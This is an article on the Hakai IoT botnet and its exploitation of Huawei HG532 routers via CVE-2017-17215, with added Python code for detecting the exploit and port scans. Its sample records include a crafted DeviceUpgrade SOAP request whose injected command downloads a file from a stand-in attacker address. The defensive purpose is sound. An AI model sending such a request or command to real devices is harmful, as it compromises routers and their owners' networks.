The Hakai IoT botnet is a dangerous threat that is being distributed in a global attack campaign targeting home routers from all popular brands. It is built on the foundations of an older botnet, with heavy upgrades.
Hakai IoT Botnet Attacks Routers
The Hakai IoT botnet is a recently identified malicious payload observed in a global attack campaign. It attempts to intrude onto user networks by probing home routers for known vulnerabilities: the operators deploy scripts that automatically search for candidate devices and test them for the flaw. The attacks began with probes against Huawei HG532 routers using an exploit for CVE-2017-17215, a remote code execution vulnerability that lets attackers run commands of their choosing on the device. Vulnerable devices respond to crafted packets sent to port 37215, the port of the router's UPnP service. To prevent any abuse, owners of these devices should update their firmware to the latest available version.
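A defender watching for the first stage of this campaign can match the exploit pattern in HTTP traffic to port 37215. The following is an added example, not code from the article or from the botnet itself: it assumes request records already extracted by a proxy or IDS with hypothetical field names (src, dst_port, method, path, body), uses the publicly documented details of CVE-2017-17215 (the DeviceUpgrade SOAP endpoint and the NewStatusURL/NewDownloadURL parameters that reach a shell), and runs over constructed sample records.

```python
import re

# Publicly documented details of CVE-2017-17215 (Huawei HG532): the UPnP service on
# TCP port 37215 passes the NewStatusURL / NewDownloadURL parameters of a
# DeviceUpgrade SOAP request to a shell without sanitising them.
HG532_PORT = 37215
HG532_PATH = "/ctrlt/DeviceUpgrade_1"
INJECTED_PARAMS = ("NewStatusURL", "NewDownloadURL")
# Shell metacharacters that have no place inside a plain URL-typed field.
SHELL_META = re.compile(r"[;|&`]|\$\(")


def is_hg532_exploit(rec):
    """True if an HTTP request record (hypothetical field names) looks like a
    CVE-2017-17215 attempt: right port, right endpoint, shell syntax in a URL field."""
    if rec.get("dst_port") != HG532_PORT:
        return False
    if rec.get("method") != "POST" or rec.get("path") != HG532_PATH:
        return False
    body = rec.get("body", "")
    for param in INJECTED_PARAMS:
        m = re.search(rf"<{param}>(.*?)</{param}>", body, re.S)
        if m and SHELL_META.search(m.group(1)):
            return True
    return False


def find_exploit_attempts(records):
    """Return the records that match the exploit pattern."""
    return [r for r in records if is_hg532_exploit(r)]


# Constructed sample records for the example (not captured traffic).
SAMPLE_RECORDS = [
    # A legitimate firmware upgrade request carrying plain URLs.
    {"src": "192.0.2.20", "dst_port": 37215, "method": "POST",
     "path": "/ctrlt/DeviceUpgrade_1",
     "body": "<NewStatusURL>http://192.0.2.1/status</NewStatusURL>"
             "<NewDownloadURL>http://192.0.2.1/fw.bin</NewDownloadURL>"},
    # An exploit attempt: a shell substitution injected into NewStatusURL.
    {"src": "198.51.100.7", "dst_port": 37215, "method": "POST",
     "path": "/ctrlt/DeviceUpgrade_1",
     "body": "<NewStatusURL>$(/bin/busybox wget http://198.51.100.7/x -O /tmp/x)"
             "</NewStatusURL><NewDownloadURL>HUAWEIUPNP</NewDownloadURL>"},
    # Unrelated traffic to the router's web interface.
    {"src": "192.0.2.21", "dst_port": 80, "method": "GET", "path": "/", "body": ""},
]


if __name__ == "__main__":
    for hit in find_exploit_attempts(SAMPLE_RECORDS):
        print("CVE-2017-17215 attempt from", hit["src"])
```

The check deliberately keys on the combination of port, endpoint and shell syntax rather than on any particular payload, so it still fires when the botnet swaps the downloaded binary or the hosting address. A `&` inside a genuine query string would also match; if the router's legitimate management traffic uses such URLs, narrow SHELL_META accordingly.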
In August, the security researchers tracking Hakai found that the botnet had been upgraded to act against a wider range of devices: D-Link routers using the HNAP protocol, generic IoT devices and Realtek routers. This change shows that the criminals behind it keep the threat constantly updated, and it is possible that a larger collective is behind its development.
Several characteristics are distinctive to Hakai:
- Port Scanner — the Hakai botnet scans target devices for open ports and makes automated entry attempts against the most commonly used services.
- Custom Versions — two offspring versions derived from Hakai have been identified, called Kenjiro and Izuku. They feature slight code variations.
- Active Development — the botnet's capabilities and target list are updated frequently.
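The port-scanning behaviour listed above is visible from the victim's side as one source touching several service ports on several hosts within a short time. The following is an added example of that detection, not code from the article or from the botnet: it assumes a hypothetical connection-log line format (`ts=<epoch> src=<ip> dst=<ip> dport=<port>`), an illustrative set of watched ports chosen for the example, and constructed sample lines.

```python
import re
from collections import defaultdict

# Illustrative set of service ports a router-targeting botnet tries; an assumption
# for this example, not a list taken from the article.
WATCHED_PORTS = {21, 22, 23, 80, 443, 2323, 8080, 37215}

# Hypothetical log line format assumed for the example.
LINE_RE = re.compile(r"ts=(\d+) src=(\S+) dst=(\S+) dport=(\d+)")


def parse_conn_log(lines):
    """Parse 'ts=<epoch> src=<ip> dst=<ip> dport=<port>' lines into dicts."""
    conns = []
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            conns.append({"ts": int(m.group(1)), "src": m.group(2),
                          "dst": m.group(3), "dport": int(m.group(4))})
    return conns


def find_scanners(conns, window=60, min_ports=3, min_hosts=2):
    """Return {src: (distinct_ports, distinct_hosts)} for every source that, inside
    one `window`-second bucket, touched at least `min_ports` watched ports on at
    least `min_hosts` different destinations."""
    buckets = defaultdict(lambda: (set(), set()))
    for c in conns:
        if c["dport"] not in WATCHED_PORTS:
            continue
        ports, hosts = buckets[(c["src"], c["ts"] // window)]
        ports.add(c["dport"])
        hosts.add(c["dst"])
    flagged = {}
    for (src, _), (ports, hosts) in buckets.items():
        if len(ports) >= min_ports and len(hosts) >= min_hosts:
            p, h = flagged.get(src, (0, 0))
            flagged[src] = (max(p, len(ports)), max(h, len(hosts)))
    return flagged


# Constructed sample log for the example (not a real capture).
SAMPLE_LOG = [
    "ts=1000 src=198.51.100.7 dst=192.0.2.10 dport=23",
    "ts=1001 src=198.51.100.7 dst=192.0.2.10 dport=2323",
    "ts=1002 src=198.51.100.7 dst=192.0.2.11 dport=37215",
    "ts=1003 src=198.51.100.7 dst=192.0.2.12 dport=80",
    "ts=1004 src=198.51.100.7 dst=192.0.2.12 dport=8080",
    "ts=1005 src=203.0.113.5 dst=192.0.2.10 dport=443",
    "ts=1030 src=203.0.113.5 dst=192.0.2.10 dport=443",
    "ts=1040 src=203.0.113.9 dst=192.0.2.10 dport=22",
    "ts=1041 src=203.0.113.9 dst=192.0.2.10 dport=23",
    "ts=1042 src=203.0.113.9 dst=192.0.2.10 dport=80",  # three ports, one host
]


if __name__ == "__main__":
    for src, (ports, hosts) in find_scanners(parse_conn_log(SAMPLE_LOG)).items():
        print(f"scanner {src}: {ports} ports across {hosts} hosts")
```

Requiring both several ports and several hosts keeps a single admin checking one router from being flagged (the 203.0.113.9 lines above), while the botnet's sweep across a subnet is caught. Fixed time buckets can split a scan that straddles a boundary; a sliding window costs more memory but avoids that gap.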
It is possible that the custom strains and the ongoing updates are the work of different hacking groups. IoT botnets like Hakai are often sold on underground hacker markets for a profit; buyers can purchase custom versions and modify the original code themselves.
We anticipate that updates with new features will be issued soon. All IoT devices should be updated to the latest firmware versions to protect them from these automated exploitation attempts.